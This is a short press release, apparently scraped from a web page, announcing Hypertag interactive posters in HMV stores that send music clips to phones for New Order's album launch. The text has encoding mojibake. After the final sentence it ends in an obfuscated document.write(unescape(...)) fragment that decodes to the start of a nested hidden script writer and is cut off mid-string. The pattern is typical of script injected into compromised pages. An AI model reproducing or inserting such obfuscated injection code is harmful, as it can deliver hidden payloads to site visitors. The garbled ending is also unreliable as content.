The music industry's first interactive posters â€" capable of sending music clips straight to your mobile phone â€" will be unveiled in HMV's flagship London and Manchester stores to promote the launch of New Order's latest album, ‘Waiting for the Sirens to Call', later this month.
The posters, to be used as window displays in the two stores, have been commissioned by Warner Bros Records and developed by leading mobile marketing technology company, Hypertag. The posters incorporate special Hypertag units that allow consumers to receive free music clips, ringtones or wallpaper on their mobiles, depending
on phone capability.
This is the first time such groundbreaking technology has been used by the music industry. The campaign runs in the week leading up to the launch of ‘Waiting for the Sirens to Call' on Monday 28th March. The participating HMV stores are at 150 Oxford Street in London's West End and 90 Market Street in Manchester.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
